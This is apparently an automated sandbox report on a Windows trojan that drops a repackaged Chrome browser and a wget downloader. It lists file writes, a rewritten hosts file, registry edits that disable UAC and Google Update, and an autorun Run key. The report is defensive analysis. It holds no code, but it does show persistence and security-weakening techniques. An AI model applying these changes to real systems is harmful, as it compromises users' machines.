Trojan.GenericKD.2148275_5a17120a4b

Dynamic Analysis

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

installer.exe:580
Chromium.exe:1116
wget.exe:612
arsiv.exe:792
%original file name%.exe:1676

The Trojan injects its code into the following process(es):No processes have been created.

Mutexes

The following mutexes were created/opened:No objects were found.

File activity

The process installer.exe:580 makes changes in the file system.

The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Application Data\Chromium.exe (11258 bytes)

The process Chromium.exe:1116 makes changes in the file system.

The Trojan creates and/or writes to the following file(s):

%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\ko.pak (1425 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\fa.dll (9 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\ta.pak (4185 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\ms.pak (1281 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\id.pak (1281 bytes)
%Documents and Settings%\%current user%\Application Data\key.txt (249 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\fa.pak (2105 bytes)
%System%\drivers\etc\hosts (269066 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\cs.dll (10 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\zh-TW.dll (9 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\gu.pak (3073 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\gu.dll (9 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\ro.dll (10 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\hr.pak (1281 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\bg.dll (10 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\ms.dll (9 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\fil.pak (1425 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\resources.pak (43124 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\es.dll (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Application Data\ok.txt (9 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\te.pak (3361 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\ta.dll (10 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\sk.dll (10 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\fi.dll (9 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\fr.pak (1425 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\ml.pak (4545 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\mr.dll (9 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\es-419.pak (1425 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\vi.pak (1425 bytes)
%Documents and Settings%\%current user%\Cookies\index.dat (964 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\mr.pak (3073 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\am.dll (9 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\libpeerconnection.dll (15116 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\ru.dll (9 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\nb.dll (9 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\uk.pak (2321 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\jogoilaonpjembimhekgnboineibhdhf\bg.txt (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Google\Chrome\User Data\Default\Preferences (73 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\de.pak (1281 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\ar.pak (2105 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\nl.dll (10 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\zh-CN.dll (9 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\sw.dll (10 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\sl.dll (10 bytes)
%Documents and Settings%\%current user%\Application Data\setting (28 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\ca.dll (10 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\icudt.dll (76505 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\bn.dll (9 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\hi.dll (10 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\uk.dll (9 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\sl.pak (1281 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\en-GB.pak (1281 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\el.dll (10 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\lt.pak (1281 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\hi.pak (3361 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\chrome_100_percent.pak (7345 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\it.dll (10 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\th.dll (9 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\it.pak (1281 bytes)
%Documents and Settings%\%current user%\Desktop\Google Chrome.lnk (791 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\sw.pak (1281 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\he.pak (1425 bytes)
%Documents and Settings%\%current user%\Application Data\wget.exe (1333 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\lv.dll (9 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\zh-TW.pak (1281 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\th.pak (3361 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\hu.pak (1425 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\et.pak (1281 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\pl.pak (1425 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\nb.pak (1281 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\he.dll (9 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\pt-PT.pak (1425 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\chrome.dll (360605 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\PepperFlash\manifest.json (2 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\es.pak (1425 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\hr.dll (10 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\sr.pak (2321 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\fil.dll (10 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\nl.pak (1281 bytes)
%Documents and Settings%\%current user%\Application Data\bg.txt (3 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\pl.dll (10 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\pt-BR.pak (1281 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\ar.dll (9 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\tr.pak (1425 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\hu.dll (10 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\zh-CN.pak (1281 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\ja.pak (1425 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\da.pak (1281 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\am.pak (2105 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\bn.pak (3361 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\en-GB.dll (9 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\id.dll (10 bytes)
%Documents and Settings%\%current user%\Application Data\pingjs.js (34 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\es-419.dll (10 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\sk.pak (1425 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\cs.pak (1425 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\et.dll (9 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\ru.pak (2321 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\lv.pak (1425 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\ml.dll (10 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\ko.dll (9 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\kn.pak (4185 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\PepperFlash\pepflashplayer.dll (113356 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\ca.pak (1425 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\pt-PT.dll (10 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\ja.dll (9 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\te.dll (10 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\ro.pak (1425 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\pt-BR.dll (10 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\sr.dll (9 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\fi.pak (1281 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\fr.dll (10 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\kn.dll (10 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\en-US.dll (9 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\en-US.pak (1281 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\sv.pak (1281 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\tr.dll (10 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\el.pak (3073 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\de.dll (10 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\bg.pak (2321 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\vi.dll (9 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\lt.dll (10 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@joojlee[1].txt (214 bytes)
%Documents and Settings%\%current user%\Application Data\hash.txt (32 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\da.dll (10 bytes)
%Program Files%\Google\Chrome\Application\chrome.exe (5889 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\sv.dll (9 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions (0 bytes)
%Documents and Settings%\%current user%\Application Data\wget.exe (0 bytes)
%Documents and Settings%\%current user%\Application Data\bg.txt (0 bytes)
%Documents and Settings%\%current user%\Application Data\update.txt (0 bytes)
%Documents and Settings%\%current user%\Application Data\pingjs.js (0 bytes)
%Documents and Settings%\%current user%\Application Data\key.txt (0 bytes)
%Documents and Settings%\%current user%\Application Data\hash.txt (0 bytes)

The process wget.exe:612 makes changes in the file system.

The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Application Data\arsiv.exe (3878606 bytes)

The process arsiv.exe:792 makes changes in the file system.

The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\lt.dll (10 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\sl.pak (762 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\sw.pak (762 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\cs.pak (250 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\es-419.dll (10 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\bn.pak (2282 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\vi.pak (762 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\lv.pak (762 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\ml.dll (10 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\ru.pak (2282 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\ko.dll (9 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\fa.pak (2282 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\hu.pak (762 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\ms.dll (9 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\lv.dll (9 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\ja.dll (9 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\nl.dll (10 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\ro.dll (10 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\pt-PT.pak (250 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\ca.pak (762 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\fi.dll (9 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\da.pak (762 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\tr.dll (10 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\en-US.pak (762 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\id.pak (762 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\uk.pak (2282 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\hu.dll (10 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\nl.pak (762 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\PepperFlash\manifest.json (2 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\libpeerconnection.dll (56491 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\da.dll (10 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\sl.dll (10 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\en-GB.dll (9 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\ru.dll (9 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\ar.pak (2282 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\PepperFlash\pepflashplayer.dll (277843 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\sk.pak (762 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\ro.pak (762 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\et.dll (9 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\es.dll (10 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\pl.dll (10 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\gu.dll (9 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\kn.pak (4074 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\gu.pak (2282 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\hr.dll (10 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\sr.pak (2282 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\fil.dll (10 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\sw.dll (10 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\sv.dll (9 bytes)
%Documents and Settings%\%current user%\Application Data\browser\chrome.exe (30992 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\icudt.dll (455362 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\tr.pak (250 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\fr.dll (10 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\el.dll (10 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\am.dll (9 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\id.dll (10 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\he.pak (762 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\am.pak (2282 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\it.pak (250 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\fr.pak (762 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\es-419.pak (762 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\it.dll (10 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\th.dll (9 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\bg.pak (2282 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\cs.dll (10 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\fa.dll (9 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\ta.pak (5049 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\nb.dll (9 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\pt-BR.dll (10 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\ca.dll (10 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\sr.dll (9 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\te.dll (10 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\bg.dll (10 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\ja.pak (1274 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\sv.pak (762 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\lt.pak (762 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\chrome_100_percent.pak (6625 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\en-GB.pak (762 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\kn.dll (10 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\uk.dll (9 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\en-US.dll (9 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\ta.dll (10 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\vi.dll (9 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\mr.pak (2282 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\zh-CN.dll (9 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\ar.dll (9 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\zh-CN.pak (762 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\de.dll (10 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\mr.dll (9 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\zh-TW.dll (9 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\et.pak (2249 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\ms.pak (762 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\nb.pak (762 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\he.dll (9 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\de.pak (762 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\sk.dll (10 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\th.pak (2282 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\ko.pak (762 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\zh-TW.pak (762 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\pt-BR.pak (762 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\chrome.dll (794832 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\pt-PT.dll (10 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\fil.pak (762 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\resources.pak (40311 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\hr.pak (762 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\pl.pak (762 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\es.pak (762 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\ml.pak (4074 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\hi.pak (2282 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\el.pak (3461 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\fi.pak (762 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\bn.dll (9 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\te.pak (3257 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\hi.dll (10 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Application Data\__tmp_rar_sfx_access_check_849765 (0 bytes)

The process %original file name%.exe:1676 makes changes in the file system.

The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\RarSFX0\installer.exe (38174 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\RarSFX0 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RarSFX0\installer.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RarSFX0\__tmp_rar_sfx_access_check_831828 (0 bytes)

Registry activity

The process installer.exe:580 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "DC BA B1 02 CE F8 15 52 E8 99 71 4F F8 3F 77 FE"

The process Chromium.exe:1116 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1D 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system]
"EnableLUA" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "22 74 8A 87 1E C4 69 C0 B8 A5 90 6B 82 78 3F CE"

[HKLM\SOFTWARE\Policies\Google\Update]
"UpdateDefault" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
